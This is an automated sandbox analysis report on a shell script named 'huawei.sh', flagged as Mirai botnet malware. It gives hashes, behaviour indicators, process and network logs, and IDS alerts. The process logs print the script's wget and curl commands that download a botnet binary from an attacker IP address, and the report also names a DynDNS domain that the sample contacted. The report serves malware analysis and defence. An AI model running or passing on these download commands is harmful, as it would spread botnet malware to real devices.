File name:

huawei.sh

Full analysis: https://app.any.run/tasks/b308519e-63a5-46e7-8fdc-bd32ecedb842
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Malware Trends Tracker     >>>
Analysis date: September 23, 2024, 08:44:29
OS: Ubuntu 22.04.2
Tags:
mirai
botnet
Indicators:
MIME: text/x-shellscript
File info: Bourne-Again shell script, ASCII text executable
MD5:

DF9D36B5977AB239408D11C6E3453C7B

SHA1:

60E7EA940BC51A0AA5D9D0425B3E6312C6C85221

SHA256:

9085AFD2289868B0662BE095EB5746BAA756C7774042867E42381CC3983C0D37

SSDEEP:

24:vpSVeSV6pS7S0ppS3CS3apSUSMpSZSgDpSZCSZcpSTSMpSddSdU9pSCSqpS6SMJ+:vIr6GqVa1AVeS9bDIss

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • MIRAI has been detected (SURICATA)

      • wget (PID: 13954)

  • SUSPICIOUS

    • Reads /proc/mounts (likely used to find writable filesystems)

      • curl (PID: 13955)
      • curl (PID: 14226)
      • curl (PID: 14255)
      • curl (PID: 14285)
      • check-new-release-gtk (PID: 14326)

    • Uses wget to download content

      • huawei.sh (PID: 13916)

    • Modifies file or directory owner

      • sudo (PID: 13912)

    • Manipulating modules (likely to execute programs on system boot)

      • modprobe (PID: 13985)
      • modprobe (PID: 14016)
      • modprobe (PID: 14044)
      • modprobe (PID: 14074)
      • modprobe (PID: 14104)
      • modprobe (PID: 14134)
      • modprobe (PID: 14165)
      • modprobe (PID: 14253)
      • modprobe (PID: 14224)
      • modprobe (PID: 14196)
      • modprobe (PID: 14312)
      • modprobe (PID: 14283)

    • Potential Corporate Privacy Violation

      • wget (PID: 13918)
      • wget (PID: 13954)
      • wget (PID: 13986)
      • curl (PID: 13955)
      • wget (PID: 14105)
      • wget (PID: 14135)
      • wget (PID: 14045)
      • wget (PID: 14017)
      • wget (PID: 14075)
      • wget (PID: 14254)
      • curl (PID: 14255)
      • wget (PID: 14166)
      • wget (PID: 14197)

    • Connects to unusual port

      • wget (PID: 13918)
      • wget (PID: 13954)
      • wget (PID: 14045)
      • wget (PID: 14075)
      • curl (PID: 13955)
      • wget (PID: 13986)
      • wget (PID: 14017)
      • curl (PID: 14226)
      • wget (PID: 14166)
      • wget (PID: 14197)
      • wget (PID: 14225)
      • wget (PID: 14254)
      • curl (PID: 14255)
      • wget (PID: 14284)
      • curl (PID: 14285)
      • wget (PID: 14105)
      • wget (PID: 14135)
      • WTH (PID: 13952)

    • Executes commands using command-line interpreter

      • update-notifier (PID: 14324)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
356
Monitored processes
138
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start sh no specs sudo no specs chown no specs chmod no specs sudo no specs huawei.sh no specs locale-check no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs systemctl no specs cat no specs chmod no specs wth no specs #MIRAI wget wth curl wth no specs systemctl no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget systemctl no specs snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs systemctl no specs cat no specs chmod no specs bash no specs modprobe no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget curl snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget curl snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget curl snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs update-notifier no specs sh no specs check-new-release-gtk dpkg no specs dpkg no specs lsb_release no specs lsb_release no specs lsb_release no specs lsb_release no specs

Process information

PID
CMD
Path
Indicators
Parent process
13911/bin/sh -c "sudo chown user /home/user/Desktop/huawei\.sh && chmod +x /home/user/Desktop/huawei\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/huawei\.sh "/bin/shany-guest-agent
User:
user
Integrity Level:
UNKNOWN
Exit code:
14106
13912sudo chown user /home/user/Desktop/huawei.sh/usr/bin/sudosh
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
13913chown user /home/user/Desktop/huawei.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
13914chmod +x /home/user/Desktop/huawei.sh/usr/bin/chmodsh
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
13915sudo -iu user /home/user/Desktop/huawei.sh/usr/bin/sudosh
User:
user
Integrity Level:
UNKNOWN
Exit code:
14076
13916/bin/bash /home/user/Desktop/huawei.sh/home/user/Desktop/huawei.shsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
14096
13917/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkhuawei.sh
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
13918wget http://154.216.18.230:85/zmap.x86/usr/bin/wget
huawei.sh
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
13919curl -O http://154.216.18.230:85/zmap.x86/snap/snapd/current/usr/bin/snaphuawei.sh
User:
user
Integrity Level:
UNKNOWN
Exit code:
485
13933/snap/snapd/20290/usr/lib/snapd/snap-seccomp version-info/snap/snapd/20290/usr/lib/snapd/snap-seccompsnap
User:
user
Integrity Level:
UNKNOWN
Exit code:
13912
Executable files
0
Suspicious files
1
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
13918wget/tmp/zmap.x86binary
MD5:
SHA256:
14326check-new-release-gtk/tmp/#6030006 (deleted)text
MD5:
SHA256:
14326check-new-release-gtk/tmp/#6030007 (deleted)text
MD5:
SHA256:
14326check-new-release-gtk/tmp/#6030008 (deleted)text
MD5:
SHA256:
14326check-new-release-gtk/tmp/#6030009 (deleted)text
MD5:
SHA256:
14326check-new-release-gtk/tmp/#6030010 (deleted)text
MD5:
SHA256:
14326check-new-release-gtk/tmp/#6030011 (deleted)text
MD5:
SHA256:
14326check-new-release-gtk/tmp/#6030012 (deleted)text
MD5:
SHA256:
14326check-new-release-gtk/tmp/#6030013 (deleted)text
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
68
TCP/UDP connections
49
DNS requests
31
Threats
69

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
91.189.91.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
91.189.91.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
91.189.91.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
POST
185.125.188.59:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
POST
185.125.188.58:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
POST
185.125.188.59:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
POST
185.125.188.54:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
POST
200
185.125.188.54:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
tss
43.5 Kb
POST
200
185.125.188.55:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
tss
43.5 Kb
POST
200
185.125.188.59:443
https://api.snapcraft.io/api/v1/snaps/auth/sessions
unknown
binary
587 b
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
91.189.91.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
470
avahi-daemon
224.0.0.251:5353
unknown
37.19.194.80:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
169.150.255.183:443
odrs.gnome.org
GB
whitelisted
195.181.170.18:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
185.125.188.58:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
185.125.188.55:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
91.189.91.96:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 91.189.91.98
  • 91.189.91.49
  • 91.189.91.96
  • 185.125.190.98
  • 91.189.91.97
  • 185.125.190.49
  • 185.125.190.48
  • 185.125.190.17
  • 185.125.190.97
  • 91.189.91.48
  • 185.125.190.96
  • 185.125.190.18
  • 2620:2d:4000:1::23
  • 2620:2d:4002:1::198
  • 2001:67c:1562::24
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::2a
  • 2001:67c:1562::23
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::2b
  • 2620:2d:4002:1::196
whitelisted
odrs.gnome.org
  • 37.19.194.80
  • 212.102.56.179
  • 207.211.211.27
  • 195.181.170.18
  • 195.181.175.41
  • 169.150.255.183
  • 169.150.255.180
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::18
whitelisted
api.snapcraft.io
  • 185.125.188.54
  • 185.125.188.55
  • 185.125.188.58
  • 185.125.188.59
whitelisted
google.com
  • 216.58.206.46
  • 2a00:1450:4001:82b::200e
whitelisted
fgwe.myvnc.com
unknown
193.100.168.192.in-addr.arpa
unknown
changelogs.ubuntu.com
  • 91.189.91.49
  • 185.125.190.17
  • 185.125.190.18
  • 91.189.91.48
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::2a
whitelisted

Threats

PID
Process
Class
Message
13918
wget
Potentially Bad Traffic
ET INFO x86 File Download Request from IP Address
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
Potentially Bad Traffic
ET INFO x86 File Download Request from IP Address
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .x86
13918
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download
13918
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .x86
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download
13952
WTH
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.myvnc .com
13955
curl
Potentially Bad Traffic
ET INFO MIPS File Download Request from IP Address
13955
curl
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
huawei.sh